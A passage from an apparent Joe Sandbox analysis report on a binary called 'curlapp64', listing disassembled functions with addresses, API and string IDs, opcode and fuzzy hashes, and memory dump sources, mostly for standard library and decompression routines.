                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                  • Opcode ID: 7302add62414e905ea2cf4951209c3e106a3d14f419694475448abafcf62f820
                                                                                                                                                                                                  • Instruction ID: d44bcdca5f2f75eeca9a1aa2ea32795fb9a778dcb0d1191651471b44c141edc6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7302add62414e905ea2cf4951209c3e106a3d14f419694475448abafcf62f820
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94618F32D18B8585DB209F15E4413AAB7E0FB84B95F045225EBDC43B9ADF7CD190CB11
                                                                                                                                                                                                  Function 00007FF6CF9713E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 1346393832-278324492
                                                                                                                                                                                                  • Opcode ID: 69c9a688bf6d94f6cf04adfc4f9a140e7ad04d0e2d0b599ac85f8dd6ba8fc416
                                                                                                                                                                                                  • Instruction ID: dff4391b0b4be062202720eb9009340d41f43702026bef4d55104c9b6d47e102
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69c9a688bf6d94f6cf04adfc4f9a140e7ad04d0e2d0b599ac85f8dd6ba8fc416
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F441CC22B08B8182EF149F26E45036D6361EB89BD5F548132EBDD47B9ADF7CE4D08310
                                                                                                                                                                                                  Function 00007FF6CF97C600 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                  • API String ID: 2775327233-1405518554
                                                                                                                                                                                                  • Opcode ID: d720c89f65a672feaa7031293e96cebc7aca7cc0688f93d45d261ae42c30dc8e
                                                                                                                                                                                                  • Instruction ID: be9dd14f7714301f74a8cd1d86c1e33da0738ac4c2120912f2c9d8137211694f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d720c89f65a672feaa7031293e96cebc7aca7cc0688f93d45d261ae42c30dc8e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2415A22B1AB4189EF64DF70D4A02AC33A4EF44749F084435EE8DA7A5EDF38D522D364
                                                                                                                                                                                                  Function 00007FF6CF9B6C20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: U$ZYo
                                                                                                                                                                                                  • API String ID: 442123175-3316853509
                                                                                                                                                                                                  • Opcode ID: 52cd24085de4200e5b0326f7b45c8803d0ef1a00770d230934afa6f2523a4469
                                                                                                                                                                                                  • Instruction ID: 34341239a822ebae95118d0ec5e5bce21793c49879bec00a99d8b447a309e6dc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52cd24085de4200e5b0326f7b45c8803d0ef1a00770d230934afa6f2523a4469
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F41E522A29A8186DB20CF65E8447A9B7B0FB88785F404431EE8DC779DDF7CE445CB60
                                                                                                                                                                                                  Function 00007FF6CF9A3B30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 838830666-278324492
                                                                                                                                                                                                  • Opcode ID: bf225c5a4a3fb3c3a11e40915116d7fe52c78dc6cfa59fa603f99e0038b3ae53
                                                                                                                                                                                                  • Instruction ID: a46e6aff358041c3e999e371df38875b8f89ccab7577f4e715fe3dc9bbc2fa9e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf225c5a4a3fb3c3a11e40915116d7fe52c78dc6cfa59fa603f99e0038b3ae53
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5921C534A08B82C6EA408F58F8413A5A7E4FB84786F901139D9CEC33A6DFBDE4558724
                                                                                                                                                                                                  Function 00007FF8B9F63650 Relevance: 6.4, APIs: 5, Instructions: 134COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memmove
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2162964266-0
                                                                                                                                                                                                  • Opcode ID: 33f16466be6dc610e467b3971b1e27369afad50301fb7faa32c85e5fe2eeb4c8
                                                                                                                                                                                                  • Instruction ID: 5947bd6d90cebc6f60bb8a58eff2f9c62e2d0d6155a84e0c6cb5399db989b524
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33f16466be6dc610e467b3971b1e27369afad50301fb7faa32c85e5fe2eeb4c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F510776A15B8183EB588F29D5803A933A1FB49B98F046235DF4D07B96DF79E4A0C740
                                                                                                                                                                                                  Function 00007FF8B9F67A09 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 278COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: $ $header crc mismatch
                                                                                                                                                                                                  • API String ID: 0-4092041874
                                                                                                                                                                                                  • Opcode ID: f3e859156d2f2df6e50947c2d61307279f2c89dfe3362d84fd54485fae15644e
                                                                                                                                                                                                  • Instruction ID: 5a3534a4d4605aa20f372136fbfccd4e38e571319fc8cfdcbf42348d5b563b78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3e859156d2f2df6e50947c2d61307279f2c89dfe3362d84fd54485fae15644e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02C1B662A183D54BEBA58F1CC088F3E7AE9EF44795F056538EB49473A8CB38E940C740
                                                                                                                                                                                                  Function 00007FF6CF97B3E0 Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 73155330-0
                                                                                                                                                                                                  • Opcode ID: 08b5c82cf7ef5729a976c2df018e29c9679d255f028ffdbdf2e76418c90e4b16
                                                                                                                                                                                                  • Instruction ID: 2b8aac477479dff17eec8ea1f11d54cf4c2b445293c713087f5bc484143a7c53
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b5c82cf7ef5729a976c2df018e29c9679d255f028ffdbdf2e76418c90e4b16
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF71B262B0874685EE20AF16A5043B9A392EB45BE5F544632DFED8B7DFDE7CE0418310
                                                                                                                                                                                                  Function 00007FF8B9F65A30 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _lseeki64free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 862710683-0
                                                                                                                                                                                                  • Opcode ID: 50d2be553c71d21b494f3438860be55513b4cdd3f140773280a45a7753013158
                                                                                                                                                                                                  • Instruction ID: e9cc7102f3a4ac3eb3da6cc55aeb87a0153c2e4a50f64fa01c93203c79d7cbcd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50d2be553c71d21b494f3438860be55513b4cdd3f140773280a45a7753013158
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB512E72A05B8686EB688F2CD54422877A1EB40FF9F645335C76D16BE8CF78E851C740
                                                                                                                                                                                                  Function 00007FF8B9F66220 Relevance: 6.1, APIs: 4, Instructions: 118stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _errno_readmemmovestrerror
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 363002165-0
                                                                                                                                                                                                  • Opcode ID: 41a8473564084a25a2f040861077a2681525299a8a440eaec916b733327ba6bc
                                                                                                                                                                                                  • Instruction ID: bf2184c626bb230c5c753f038335ba7967e94bbc5656bb0c33bc36f89b12ec63
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41a8473564084a25a2f040861077a2681525299a8a440eaec916b733327ba6bc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F341B032A0879687EB108E7DD44122D26D1BB46BF9F286238DF1E87780DF39E446C740
                                                                                                                                                                                                  Function 00007FF8B9F68094 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memmove
                                                                                                                                                                                                  • String ID: $ $invalid stored block lengths
                                                                                                                                                                                                  • API String ID: 2162964266-1718185709
                                                                                                                                                                                                  • Opcode ID: d0a3bdb81d83d4619764f4d3bcf6a6d0fbd8176f51e719e263f53f19bff28088
                                                                                                                                                                                                  • Instruction ID: d9845e9b98e94a1aab54eeaa0cbb86277cd58cc829fd9e54db1eee7a596c1bea
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0a3bdb81d83d4619764f4d3bcf6a6d0fbd8176f51e719e263f53f19bff28088
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC41D5B3A183D58BEB618F19D488A3E3AADFB447A1F115439DB4947790CB38E984C740
                                                                                                                                                                                                  Function 00007FF6CF9AA37C Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: f16319243a80464280e95f1c086ea1042b7c5269695a3174b8d11ba6174b0bf2
                                                                                                                                                                                                  • Instruction ID: f14800e6025e2383f201fc711cc64184be344e16401cc0c8efee20465868c144
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f16319243a80464280e95f1c086ea1042b7c5269695a3174b8d11ba6174b0bf2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F416C22D08A85C6EB669F25D8142BDBBE0EB85F45F49C071D6CD8738BDE3D9845C322
                                                                                                                                                                                                  Function 00007FF8B9F6DE10 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                  • Opcode ID: c8cdf1e9fd00de5acfafd2f8202f34d4a15b464e92bf36e3d66a35bc2a84f537
                                                                                                                                                                                                  • Instruction ID: ea9846228d4b206ed20fd57782c4e0c3032d5e7211c261cdce6b333d1c899831
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8cdf1e9fd00de5acfafd2f8202f34d4a15b464e92bf36e3d66a35bc2a84f537
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D113C22B18F468AEB00DF64E8542B833A4FB197A9F441E31DB6D467A8DF7CD158C340
                                                                                                                                                                                                  Function 00007FF6CF99E800 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 3668304517-278324492
                                                                                                                                                                                                  • Opcode ID: e3641a5d20123f4d436839f655b93fa68de5431ca11df3343b0132ed85754e1c
                                                                                                                                                                                                  • Instruction ID: 3427a6c4c8824b9a1178bfea6af073348bd545facde6c6c0737682a3943e2f82
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3641a5d20123f4d436839f655b93fa68de5431ca11df3343b0132ed85754e1c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51D1EF22E18B8189EF509F68D4403FC77A1FB45799F554232EACD93A9ADF38D680C720
                                                                                                                                                                                                  Function 00007FF6CF9A0730 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 0-278324492
                                                                                                                                                                                                  • Opcode ID: 648a9caa7db419762c8981791c2a16e2b1b6bba27aa881d705305ab58cefb6bd
                                                                                                                                                                                                  • Instruction ID: dfd733eb1725b686b99700011dc3cee57ab0d4be9c2833bc60116e8211baa6f0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 648a9caa7db419762c8981791c2a16e2b1b6bba27aa881d705305ab58cefb6bd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BD1BD22E1878189EF508F68E4442BC67E1FB85799F504136EADD93AAADF3CD485CB10
                                                                                                                                                                                                  Function 00007FF6CF990710 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 3668304517-278324492
                                                                                                                                                                                                  • Opcode ID: 73cf4b6d23cffc821d3cfaf6e4ffa0d29d8806b0904d59e9354c610eaab7324b
                                                                                                                                                                                                  • Instruction ID: e6dc08bac05a1bd7c6d62a76b96c197eb514acd14827272559dc5c642aaa0620
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73cf4b6d23cffc821d3cfaf6e4ffa0d29d8806b0904d59e9354c610eaab7324b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3C1C362B15B8289EF10CFB5C0503ED2371AB457A9F115232CEAD677DADE39E185C390
                                                                                                                                                                                                  Function 00007FF6CF9788D0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
